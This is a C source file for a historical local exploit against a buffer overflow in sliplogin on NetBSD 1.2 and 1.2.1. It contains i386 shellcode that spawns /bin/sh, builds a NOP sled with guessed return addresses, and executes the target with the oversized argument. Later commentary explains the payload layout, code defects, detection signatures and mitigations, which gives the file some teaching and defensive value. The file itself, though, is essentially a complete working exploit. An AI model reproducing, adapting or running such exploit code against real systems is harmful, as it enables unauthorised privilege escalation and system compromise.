/*	Coded by: humble of Rhino9
	sliplogin buffer overflow for NetBSD 1.2 and 1.2.1
*/

#include <stdlib.h>
#include <unistd.h>

/*
 * Raw i386 machine-code payload, stored as a C string literal.
 * Nothing here is interpreted by this file; it is copied byte-for-byte
 * into the argument buffer in main().  The only human-readable part is
 * the "/bin/sh" string near the end, which makes the intent (spawn a
 * shell) plain without decoding the rest.  Because it is a C string,
 * its length is later measured with strlen(), so any 0x00 byte inside
 * it would silently truncate the payload -- presumably why the trailing
 * filler uses 0x01..0x04 rather than zeros (not verified here).
 *
 * Detection note: a long run of 0x90 followed by a sequence like this
 * in the argv of a privileged program is a classic stack-smash signature.
 */
char shellcode[] =
  "\xeb\x23"
   "\x5e"
   "\x8d\x1e"
   "\x89\x5e\x0b"
   "\x31\xd2"
   "\x89\x56\x07"
   "\x89\x56\x0f"
   "\x89\x56\x14"
   "\x88\x56\x19"
   "\x31\xc0"
   "\xb0\x3b"
   "\x8d\x4e\x0b"
   "\x89\xca"
   "\x52"
   "\x51"
   "\x53"
   "\x50"
   "\xeb\x18"
   "\xe8\xd8\xff\xff\xff"
   "/bin/sh"
   "\x01\x01\x01\x01"
   "\x02\x02\x02\x02"
  "\x03\x03\x03\x03"
  "\x9a\x04\x04\x04\x04\x07\x04";

/*
 * Return the current stack pointer.
 *
 * Copies %esp into %eax and then falls off the end of the function with
 * no C `return`, relying on %eax being the i386 integer return register.
 * In standard C this is undefined behaviour (missing return in a non-void
 * function whose value is used); it only "works" on a 32-bit x86 ABI with
 * a compiler that does not reorder or discard the asm statement.  Modern
 * toolchains reject it under -Werror=return-type.  The value observed
 * also depends on the caller's frame layout, so any change to the locals
 * in main() changes what this returns.
 */
unsigned long get_esp(void)
{
 __asm__("movl %esp, %eax");
}

/*
 * Build an oversized argument and pass it to /usr/sbin/sliplogin.
 *
 * argv[1] (optional): integer "buffer delta" added to the fixed payload
 * size; defaults to 4.  The value is taken from atoi() with no range
 * check, so a negative or very large delta makes the malloc()/memset()
 * sizes below inconsistent (memset would write beyond the allocation).
 *
 * Layout written into buf, in order:
 *   - 2268+off bytes of 0x90 (NOP sled), with the shellcode overwriting
 *     the tail of that region,
 *   - seven copies of get_esp() as guessed return addresses (the 28 in
 *     the malloc size is 7 * 4 bytes, i.e. assumes 32-bit `long`),
 *   - a terminating 0 byte.
 *
 * Portability / correctness notes (left as-is, this is historical code):
 *   - `void main` is non-standard; should be `int main`.
 *   - printf(), memset() and strlen() are used without <stdio.h> /
 *     <string.h>; implicit declarations are an error on current compilers.
 *   - adr is `unsigned long *` but is assigned via a `(long *)` cast.
 *   - strlen(shellcode) is re-evaluated on every loop iteration.
 *   - execl() is not checked; on failure the function simply returns.
 *
 * Mitigation context for defenders: the weakness exercised here is the
 * target's lack of a length check on its argument.  Bounds-checked
 * argument handling, a non-executable stack and dropping any setuid bit
 * from sliplogin (presumably privileged -- not stated in this file)
 * each break this approach.
 */
void main(int argc, char **argv)
{
 char *buf,*p;
 unsigned long *adr;

 int i,off;

	if (argc>1)
		off=atoi(argv[1]);  /* unchecked: negative values underflow the sizes below */
	else off=4;
printf("using buffer delta:%d\n",off);

 /* 2268 bytes of sled+payload, off bytes of slack, 28 bytes of addresses (no room reserved for the final 0 byte) */
 if((p = buf = malloc(2268+28+off))==NULL)
  exit(-1);

 memset(p, 0x90, 2268+off);
 p += 2268+off - strlen(shellcode);  /* payload sits at the end of the sled */

 for(i = 0; i < strlen(shellcode); i++)
  *p++ = shellcode[i];
 adr = (long *)p;
 for(i = 0; i < 7; i++)
  *adr++ = get_esp();  /* same guessed address repeated 7 times */
 p = (char *)adr;
 *p = 0;  /* this write lands at offset 2268+28+off, one past the allocation */
 execl("/usr/sbin/sliplogin", "sliplogin",buf, NULL);
}
